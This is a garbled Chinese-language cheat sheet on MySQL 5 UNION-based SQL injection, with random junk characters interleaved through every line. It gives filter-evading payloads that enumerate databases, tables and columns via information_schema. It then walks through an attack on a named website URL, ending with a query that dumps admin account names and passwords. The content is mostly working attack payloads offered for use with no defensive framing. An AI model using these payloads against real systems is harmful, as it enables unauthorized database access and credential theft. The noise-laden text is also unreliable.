查库& `# g) n0 f+ l( i" G
/ k3 e" `5 N: v8 Z0 I, N/ x
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*' |7 f& D- @7 M4 s3 {5 U8 B; D) z
: k4 f4 X3 Y# J; a
查表
; M) z8 o0 s2 i: i# S6 l' A k; [5 Y0 D. e0 `6 L4 r4 R6 `" I
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1& I8 r! h( x) w
L, s- U1 Y! d查段
0 v4 ^3 Z# j% k6 p' ]! }; Y$ ]; L& F( B0 N5 m
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
+ t% p$ V. b9 b( Z! a' ?0 s. t
& R8 |& p% H8 E) o" ?
2 s& X. S( D( p2 }mysql5高级注入方法暴表6 l: M9 ?+ h7 y
: T4 k- M& E7 \, Q) A
例子如下:1 d1 ~" Q) [+ G9 g @! o9 L0 t
+ d/ d- B$ P$ j1 R% z1.爆表9 A. [0 k( I. A7 |
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)$ Q0 I- L! G5 {8 y5 O
这样爆到第4个时出现了admin_user表。
& w; @: t" {4 ]) ~( E s( d( T* v
( J7 r5 }0 @3 W& h2.暴字段
" E; r0 R, F- u" I$ \http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*) P7 f4 q) f2 V
6 r& G5 |, m+ @
0 f$ b0 V3 L/ ]5 e: h# Q3.爆密码* \- b S( e0 s$ q
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
) N, i! V$ c. R# r% U
e, k4 q8 k% S6 e7 p/ @! V
3 J/ B3 Y' ^7 L/ a | |